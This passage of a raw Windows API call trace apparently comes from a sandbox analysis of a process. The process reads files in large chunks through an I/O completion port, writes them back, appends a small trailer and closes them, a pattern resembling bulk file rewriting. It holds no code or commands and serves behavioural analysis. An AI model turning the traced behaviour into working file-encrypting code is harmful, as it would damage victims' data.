dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.042] WriteFile (in: hFile=0x134, lpBuffer=0x4700094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x4700020 | out: lpBuffer=0x4700094*, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x4700020) returned 1 [0156.066] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.070] CloseHandle (hObject=0x680) returned 1 [0156.079] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2f30020) returned 1 [0156.080] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.080] ReadFile (in: hFile=0x65c, lpBuffer=0x4ee0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x4ee0020 | out: lpBuffer=0x4ee0124*, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x4ee0020) returned 1 [0156.080] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.080] CloseHandle (hObject=0x610) returned 1 [0156.089] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4820020) returned 1 [0156.090] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.093] WriteFile (in: hFile=0x65c, lpBuffer=0x4ee0124*, nNumberOfBytesToWrite=0x7f3b, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x4ee0020 | out: lpBuffer=0x4ee0124*, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x4ee0020) returned 1 [0156.113] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.113] ReadFile (in: hFile=0x65c, lpBuffer=0x4ee0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x4ee0020 | out: lpBuffer=0x4ee0124, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x4ee0020) returned 0x0 [0156.113] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 0 [0156.113] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4ee0020) returned 1 [0156.113] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.113] WriteFile (in: hFile=0x65c, lpBuffer=0x4ee0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x4ee0020 | out: lpBuffer=0x4ee0094*, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x4ee0020) returned 1 [0156.117] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.117] CloseHandle (hObject=0x65c) returned 1 [0156.205] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4ee0020) returned 1 [0156.205] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.205] ReadFile (in: hFile=0x67c, lpBuffer=0x2910124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x2910020 | out: lpBuffer=0x2910124*, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x2910020) returned 1 [0156.205] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.205] WriteFile (in: hFile=0x67c, lpBuffer=0x2910124*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x2910020 | out: lpBuffer=0x2910124*, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x2910020) returned 1 [0156.206] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.206] ReadFile (in: hFile=0x67c, lpBuffer=0x2910124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x2910020 | out: lpBuffer=0x2910124, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x2910020) returned 0x0 [0156.206] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 0 [0156.206] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2910020) returned 1 [0156.206] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.206] WriteFile (in: hFile=0x67c, lpBuffer=0x2910094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x2910020 | out: lpBuffer=0x2910094*, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x2910020) returned 1 [0156.206] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.206] CloseHandle (hObject=0x67c) returned 1 [0156.207] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2910020) returned 1 [0156.207] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.315] ReadFile (in: hFile=0x618, lpBuffer=0x2880124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x2880020 | out: lpBuffer=0x2880124*, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x2880020) returned 1 [0156.405] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.405] ReadFile (in: hFile=0x668, lpBuffer=0x2f30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124*, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x2f30020) returned 1 [0156.405] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.405] ReadFile (in: hFile=0x368, lpBuffer=0x4280124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x4280020 | out: lpBuffer=0x4280124*, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x4280020) returned 1 [0156.406] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.406] ReadFile (in: hFile=0x610, lpBuffer=0x4700124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x4700020 | out: lpBuffer=0x4700124*, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x4700020) returned 1 [0156.406] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.406] WriteFile (in: hFile=0x618, lpBuffer=0x2880124*, nNumberOfBytesToWrite=0x162d4, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x2880020 | out: lpBuffer=0x2880124*, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x2880020) returned 1 [0156.407] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.407] WriteFile (in: hFile=0x668, lpBuffer=0x2f30124*, nNumberOfBytesToWrite=0xfa03, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124*, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x2f30020) returned 1 [0156.407] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.407] WriteFile (in: hFile=0x368, lpBuffer=0x4280124*, nNumberOfBytesToWrite=0x14211, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x4280020 | out: lpBuffer=0x4280124*, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x4280020) returned 1 [0156.408] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.408] WriteFile (in: hFile=0x610, lpBuffer=0x4700124*, nNumberOfBytesToWrite=0x7537, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x4700020 | out: lpBuffer=0x4700124*, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x4700020) returned 1 [0156.408] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.408] ReadFile (in: hFile=0x618, lpBuffer=0x2880124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x2880020 | out: lpBuffer=0x2880124, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x2880020) returned 0x0 [0156.408] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.408] ReadFile (in: hFile=0x668, lpBuffer=0x2f30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x2f30020) returned 0x0 [0156.408] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.408] ReadFile (in: hFile=0x368, lpBuffer=0x4280124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x4280020 | out: lpBuffer=0x4280124, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x4280020) returned 0x0 [0156.408] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.408] ReadFile (in: hFile=0x610, lpBuffer=0x4700124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x4700020 | out: lpBuffer=0x4700124, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x4700020) returned 0x0 [0156.408] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 0 [0156.408] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2880020) returned 1 [0156.409] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 0 [0156.409] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2f30020) returned 1 [0156.409] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 0 [0156.409] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4280020) returned 1 [0156.409] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 0 [0156.409] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4700020) returned 1 [0156.409] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.409] WriteFile (in: hFile=0x618, lpBuffer=0x2880094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x2880020 | out: lpBuffer=0x2880094*, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x2880020) returned 1 [0156.409] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.409] WriteFile (in: hFile=0x668, lpBuffer=0x2f30094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30094*, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x2f30020) returned 1 [0156.409] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.409] WriteFile (in: hFile=0x368, lpBuffer=0x4280094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x4280020 | out: lpBuffer=0x4280094*, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x4280020) returned 1 [0156.409] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.409] WriteFile (in: hFile=0x610, lpBuffer=0x4700094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x4700020 | out: lpBuffer=0x4700094*, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x4700020) returned 1 [0156.410] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.410] CloseHandle (hObject=0x618) returned 1 [0156.411] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2880020) returned 1 [0156.412] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.412] CloseHandle (hObject=0x668) returned 1 [0156.413] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2f30020) returned 1 [0156.413] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.413] CloseHandle (hObject=0x368) returned 1 [0156.414] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4280020) returned 1 [0156.415] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.415] CloseHandle (hObject=0x610) returned 1 [0156.415] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4700020) returned 1 [0156.416] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.529] ReadFile (in: hFile=0x668, lpBuffer=0x2880124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x2880020 | out: lpBuffer=0x2880124*, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x2880020) returned 1 [0156.646] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.646] ReadFile (in: hFile=0x66c, lpBuffer=0x2f30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124*, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x2f30020) returned 1 [0156.809] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.809] ReadFile (in: hFile=0x618, lpBuffer=0x4280124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x4280020 | out: lpBuffer=0x4280124*, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x4280020) returned 1 [0156.810] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.810] ReadFile (in: hFile=0x664, lpBuffer=0x4700124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x4700020 | out: lpBuffer=0x4700124*, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x4700020) returned 1 [0156.810] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.811] WriteFile (in: hFile=0x668, lpBuffer=0x2880124*, nNumberOfBytesToWrite=0xd81a, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x2880020 | out: lpBuffer=0x2880124*, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x2880020) returned 1 [0156.811] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.811] ReadFile (in: hFile=0x63c, lpBuffer=0x4820124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x4820020 | out: lpBuffer=0x4820124*, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x4820020) returned 1 [0156.811] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.811] ReadFile (in: hFile=0x620, lpBuffer=0x4940124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x4940020 | out: lpBuffer=0x4940124*, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x4940020) returned 1 [0156.811] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.811] ReadFile (in: hFile=0x638, lpBuffer=0x4a60124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x4a60020 | out: lpBuffer=0x4a60124*, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x4a60020) returned 1 [0156.812] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.812] ReadFile (in: hFile=0x648, lpBuffer=0x4b80124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x4b80020 | out: lpBuffer=0x4b80124*, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x4b80020) returned 1 [0156.812] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, 